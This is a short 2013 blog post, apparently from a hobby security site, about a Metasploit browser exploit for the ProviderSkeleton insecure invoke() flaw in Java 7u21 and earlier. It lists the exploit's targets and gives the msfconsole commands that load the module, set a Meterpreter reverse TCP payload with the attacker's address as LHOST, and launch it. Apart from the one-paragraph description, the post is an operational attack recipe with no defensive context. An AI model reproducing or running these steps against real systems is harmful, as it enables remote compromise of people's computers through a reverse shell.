Exploit for Java version 7u21 and earlier - Pak Inu

Pak Inu

Education

Ads Help Us !

test banner

Breaking

Post Top Ad

Responsive Ads Here

Post Top Ad

Wednesday, July 3, 2013

Exploit for Java version 7u21 and earlier

Java Applet ProviderSkeleton Insecure Invoke Method:-

This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Exploit Targets

    0 - Generic (Java Payload) (default)
    1 - Windows x86 (Native Payload)
    2 - Mac OS X x86 (Native Payload)
    3 - Linux x86 (Native Payload)

$ msfconsole
msf > use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit(java_jre17_provider_skeleton) > show payloads
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_provider_skeleton) > set LHOST [MY IP ADDRESS]
msf exploit(java_jre17_provider_skeleton) > exploit





No comments:

Post a Comment

Post Top Ad